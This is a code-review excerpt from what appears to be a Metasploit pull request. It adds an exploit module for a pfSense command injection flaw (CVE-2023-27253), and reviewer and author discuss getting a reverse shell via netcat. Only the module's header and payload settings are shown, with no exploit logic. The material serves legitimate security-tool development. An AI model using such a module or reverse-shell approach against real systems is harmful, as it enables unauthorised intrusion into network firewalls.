modules/exploits/unix/http/pfsense_config_data_exec.rb

```diff
@@ -0,0 +1,174 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'pfSense Restore RRD Data Command Injection',
+        'Description' => %q{
+          This module exploits an OS Command Injection vulnerability in the pfSense
+          Config Module (CVE-2023-27253). The vulnerability affects versions <= 2.7.0
+          and can be exploited by an authenticated user if they have the
+          "WebCfg - Diagnostics: Backup & Restore" privilege.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Emir Polat', # vulnerability discovery & metasploit module
+        ],
+        'References' => [
+          ['CVE', '2023-27253'],
+          ['URL', 'https://redmine.pfsense.org/issues/13935']
+        ],
+        'DisclosureDate' => '2023-03-18',
+        'Platform' => ['unix'],
+        'Arch'           => [ ARCH_CMD ],
+        'Privileged' => true,
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'Payload'        =>
+          {
+            'Space'       => 1024,
+            'BadChars'    => "\x2F\x27",
+            'DisableNops' => true,
+            'Compat'      =>
+              {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'reverse netcat'

```

Comment:
`reverse` is not a valid command.

```suggestion
                'RequiredCmd' => 'netcat'
```

Will this module work with other payloads too? bash is usually available and reliable (if compiled with TCP support).

Reply:
Yes, however, I couldn't get a reverse shell with Telnet or any other payload from this vulnerability. Therefore, I decided to use netcat to get the shell.